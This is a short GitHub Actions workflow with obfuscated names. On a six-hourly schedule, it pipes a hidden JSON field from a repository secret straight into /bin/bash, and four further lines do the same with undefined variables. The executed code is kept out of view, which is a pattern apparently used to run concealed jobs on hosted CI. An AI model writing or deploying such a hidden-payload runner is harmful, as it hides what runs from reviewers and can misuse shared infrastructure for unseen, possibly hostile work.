name: zhouzhenjie2013

on:
  workflow_dispatch:
  schedule:
    - cron: '5 2/6 * * *'
jobs:  # 19949
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhouzhenjie2013
        env:
          znly29009: ${{ secrets.znly29009 }}
        run: |
          echo $znly29009 | jq -r .aovq50 | /bin/bash
          echo $oejw92 | jq -r .xlvx7 | /bin/bash
          echo $gg176 | jq -r .cerla5373 | /bin/bash
          echo $m44950 | jq -r .yph430 | /bin/bash
          echo $rvawt1278 | jq -r .qt79 | /bin/bash

